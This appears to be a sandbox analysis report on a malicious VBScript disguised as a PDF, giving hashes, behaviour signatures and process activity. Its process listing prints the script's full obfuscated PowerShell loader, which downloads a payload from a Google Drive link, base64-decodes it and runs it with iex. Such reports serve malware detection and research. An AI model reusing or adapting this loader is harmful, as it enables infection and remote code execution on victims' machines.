Analysis
-
max time kernel
149s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-11-2024 02:00
Static task
static1
Behavioral task
behavioral1
Sample
202411_1801_ckc30w030l01_20241118182920618388·pdf.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
202411_1801_ckc30w030l01_20241118182920618388·pdf.vbs
Resource
win10v2004-20241007-en
General
-
Target
202411_1801_ckc30w030l01_20241118182920618388·pdf.vbs
-
Size
16KB
-
MD5
e6c723d6a40150466aa011158c68e591
-
SHA1
f18348ee740329c6cb706123b34151dde9197b50
-
SHA256
969d4f51528c1a62de42fd8dfc0efaf09b1857426add53376a3e2db14456a173
-
SHA512
c9c85c17c329267d8dbed3441baa63c85cbd0abbad858dfd86632de8cd97b461d8f36c4b4fbd126712cd2664ba1e6bd2eece30fb090b9ff462ac4c052b204256
-
SSDEEP
384:X+7h2tykhjtUXkNaaYtydrEVql1UnqCrP0z9CW6fz83W4u8b:GUtbto31+rOqcnqCrMZuA3nb
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 3004 WScript.exe -
pid Process 2840 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2840 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2840 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3004 wrote to memory of 2840 3004 WScript.exe 30 PID 3004 wrote to memory of 2840 3004 WScript.exe 30 PID 3004 wrote to memory of 2840 3004 WScript.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\202411_1801_ckc30w030l01_20241118182920618388·pdf.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cartograms Repaganisers Grejss Fiberkufferterne cnidoblast Ansgningsfristen Bromkaliummet #><#Sash Multielectrode Bruttoetagearealets pentaglottical #>$Erode72='Fashionabelt';function Erosely($Hedens){If ($host.DebuggerEnabled) {$Geolatry=4} for ($Catechus=$Geolatry;;$Catechus+=5){if(!$Hedens[$Catechus]) { break }$Moderne242+=$Hedens[$Catechus]}$Moderne242}function Sammenkogs($aimwre){ .($astichous) ($aimwre)}$Tamises=Erosely ',remn .atEA.ostGips.t.ikWPillEPhotbWhorcRe iLNudii.ecie Sp n esct';$Whitecup=Erosely 'NoveM ,ntoTreyzFagtiMucolOdorlTr kaFaar/';$Opklaringsstyrkes=Erosely 'R diTDogml Kr sBest1 ea2';$gennembruds='Glut[Flj.NPre E ftet Mo .GallSBag eAfgir Medv S,niM,ltCLustEBladPp.epoTenniTrusnDamatSomtMRiveaDeminInd.AWarsg HalEVskerHyst]Pres: Sk :UnicsAfseEBacac P ru Co Rt veISndrtFlosYHe,tpTes RS eao BagtUnnooArchC WaxoSkr LSka =Terr$TusiOHeltpyamsKKretL UslALea,RSkueiVa,tNAmmogF jlSSubdS NontBonnYBud RBoliK MereFaceS';$Whitecup+=Erosely '.edb5Mobu.Ruff0Konf Mrke(AutoW r niPap nUri dSubsoSubmw E,osVeks SubsNPeakTspor Semi1 Kni0 er.,bje0 Ur.;Star GejsW T miResonOver6Depu4Herl;Udf. KnskxFav 6 dsu4 Uds;Sup Krydr SpivC ta:Extr1.rae3 Uns1Fix .Velv0 Hyp)Hove BifiGTrafeProgcFagbksl no tau/Snar2Burg0Ud,a1 an0spa 0inte1 ab,0 Cla1Hy t NewsFMultisinurBudseLongfF geoFrikx eta/Impr1 Dvr3Occi1Tils.S,lv0';$Sarcomatosis193=Erosely 'SaliUOosps PoseElfir Ph - AtoaSalmG.tavEDecunDokut';$Viderebringelse=Erosely ' FerhDrabt Im,tVealpWebssV mp:Domy/tilk/,ntad Betr Evai Disv ReneLaka.FilogBeboo urbo Pr.gU,stl DaveRosf. H pcEgepo GanmJibs/S,stuIncoc To,?Gr,meCyulxRosepAw soUngrrRevet Au =KastdQuieoGravwStarnMa.tlFo koDet aKl ddPaak&AadsiGivtdSu,e=Rede1.lexpElev7BjlkKapriVSu fTpauljethnL ociQTr bH ForcFar Rfran-Pla -Sge.4 ,orrhemoS Kd BUnmuw ParnBhat5AnnaY DomLPhipk utrXSyndz .edETraa5DholyAstiuSmudZ ArczSka.8';$Stikpillers170=Erosely 'Cask>';$astichous=Erosely ' arii MazeAfteX';$Boretaarnene='Photoplaywright';$Scena='\Benzinmotorernes218.Gna';Sammenkogs (Erosely 'Arta$RascGAnisLStedO.lumbChapA Aerl.nva:AreomVskeuTrivs.ublhFrimrForuoL ejoWal MHj.miU.irN EryGFr m=ko,t$FusiEDekoNHe nVGu t:TigeADdssPskripC rnddrgsAO,seTT leaGene+J ke$ ohaSF utCDisteD.aeN myea');Sammenkogs (Erosely 'B ge$ SocGRefuL G,uOForlb,orga gygLWho :Hva,PNyphl ChoEUndeT oothEngaowhenR C lOIn nU spisafma= Pas$BrakVAfocIAssuDDomse EmpRPhotEStavB ttarArrhI ,eknZinkgAnnoEKla l OprsCrutE Fu,.DaglsAne pI dflRelaI SkgTAnae( Ph,$BelyS bnoT catIO hiK Cirp E tISjusl S llF ureOverR AgesR nd1Stil7Min 0 Den)');Sammenkogs (Erosely $gennembruds);$Viderebringelse=$Plethorous[0];$Catechusnosilicate=(Erosely 'Disl$O,emGCystLPoinOSev BFuckaTrinlAmob:Aff,psjleoPerfsanimIRhintSammiSikrOHorvNMid s An,L VinITopmsboe tJo vE GruRK ranBedie iss nt= otiNUd rEReacwB sl-sammoskrib,ikkJS.kteepi.c,osit.erv .chaS pmny .onsSt aTFormES enMarch.nond$Car,TForea BlaM kywi macSPreseM lls');Sammenkogs ($Catechusnosilicate);Sammenkogs (Erosely 'Ophr$phoePEligoFurzsSal i ScotAyi iSempoSprin.hyssOccal berisagasSammtArkaeHukkrSh.rnEgeneMurusupqu.EnliH SumeGanga GendSpeceDesir ligsTrou[ Fst$PhagSLibiaPolyrGigacLimsoAncim,abbaT rbt StooUncosCowli entsDe a1 Pol9Circ3C ri]Oste= Eun$DkssWHjerh Ur.iUngat H meModtcShowuMl ep');$Unskirted=Erosely 'Laby$ koPGraao Cens anaiNunatRykkiForsoRepanKon s Bill BraiUnvis Tint Anne rejr dsn rygeVicesTh s.PredDRampodiasw FodnSwinlKonso Yr aFascd TakFAcc iBor lAgele Sci(rhin$S,eoVB.yniDrf dSvove St.ropune ConbSemirErnriHoevn iblgGaw eResnlG lls RepeInte, O e$Pol,F NonlTedeaRiftsSa tkFa.oeWhi rErineKlipnTyndsk.meeLgprrKlov)';$Flaskerenser=$mushrooming;Sammenkogs (Erosely 'thor$NitrGEp klFrisosterBBarsaL gtLUdls:InelS Udia B,fM Su mUdyreAnkeN ng KUnunnEleny Ab,tRe.stSub E St,DPrevEF lk= Neu(CombTUnope MisSelevtPoly- upipBak,aComstTrouhPr,n Afp$ DolF H xlGrnlaLag SK,rsKPolyeOsteRt anEPro Nh,emSOmdmESelvRper )');while (!$Sammenknyttede) {Sammenkogs (Erosely 'Bolo$SpirgRenslR,nsoNonpb Rega TmrlPina:BursBLoegaLim tSlurhItery Dets Tenc .teaAsocp LaahHapaeAbibs Mic=C st$in.eEhka uAreorUnd oPearm MyrnDolmtColuelazyr') ;Sammenkogs $Unskirted;Sammenkogs (Erosely 'Un.rSFribt N.ka KamrHj mtA gu-HypeSRundlYdelES.rteEndapRver Cl.4');Sammenkogs (Erosely 'Stud$Cyang TralUnivORottBIn.rAPietlBaga:Un esHydrAMonom SpemBouleS mmNF ankMillNethnySurvt rict,ntieEfteDmo oEIgno= Rec(anertGorgERikosWaxbT o v- BlopUartaWormtAsf Ho al krl$retsFE,zoLMa sa TaksPeliKVerdE Uger ErhEE stNH,loS PreE IjorSvr )') ;Sammenkogs (Erosely ' Ol $ forgGan l hoOO.igB beaAantiLMapp:PullFmidteTyenM ankt spaE Stan ilrApunnaVaerR ieps Camf larDSineshearePretlskilsExpadArk.aKattgAd mEEry.NMark5 Par1Gill=L nd$GuarG Fral.fseOin fbScraaO,deLResi: HenFAgatESmutiOestN jlesConcC.iochStttMun oEHolac.nthkZedsE MauRSlibE rosPara+Fugl+Budd% P a$Con pTrafL upeE unTWitchPolyoBindRMercO FaluSmukS Cau.Sa tc ,tooDispUS idnPibet') ;$Viderebringelse=$Plethorous[$Femtenaarsfdselsdagen51]}$Sabbatic=334089;$Afkog=31095;Sammenkogs (Erosely 'K.es$ IrrgIn oL BesOHe,tBKomoaAfmrLBorg:un rgHjemHFemua K orkr,trVindI SpaeG aiS.osy Ov.r=Soci SupgUnivEB batKvad-F dsC Rito fl NHe nTMiljE QuaNAdreT Byl Disc$BiosF eadLSnotaIn uS VerkL veESchoR .oleoverNKeyssrecieC.llR');Sammenkogs (Erosely 'Se.r$Inddg Klel Denocubeb Reda,yvulBegr:OccuSTyk.tPrisuSkuld.inosec imBl nu KersTa,reGrapnGas. Vri =Woad Qui[Dev SRetry olss Au tPuriecoapm M a.SiksCTo.doPickn .ulvCalleSy drforvtHalo]Tote: Det:m scFLa cr kedoFilam FjoB ifaHattsposeePin,6 De,4DykkS ductLi,erTek iSpinn bongLano( Man$DunaG T ghDiviaD lfrImp,rkendiStene W,esStag)');Sammenkogs (Erosely 'Sapr$ HaeGVi elUn xO addbE kyAUn.iLtvan:EurotBoraOUnmecPatro Cykl Ha.oNonsG Fi IBereeFedtS End brud=Stra Gar [ artSUnply edeSFlotTV,ndEGradMBolu. VipTPi eEStrmXPerstSlag.M tee tdn izzcc,ttOMultDArc i U enCadugArbu]Areo:Daga:chitaH,nsSHypoc RosIUnv iGrn..Kan Gsa oE NikTSid sAccot OfrRenliiDi knDivig Fej(I.gt$Brofsra,gTRetru ,uqDOccuSBredm,geluRdehsTegle ogenAfre)');Sammenkogs (Erosely 'Hunh$Laesg cenlFa eoTargBDemeAForslLati: Gi R SkieLat,PEvo,ULandr.fteiGeniF Rk IAtomc Ho,adansTPropiSpiooFjo NMism7Ti e9 Gal=Ager$AangtKlumOS mmCTo uO ,eiLLahlodiskGEx.uI Gr e RevS eb.T.nds HoruW,reBVectSSemiT GuirRescI ChanMetagHe n( Eks$ StrsPly a FrabTrolBDuppaDucstHj oi,omecGuld,Idol$ PelaTragFBr.dKOveroUntrG dep)');Sammenkogs $Repurification79;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b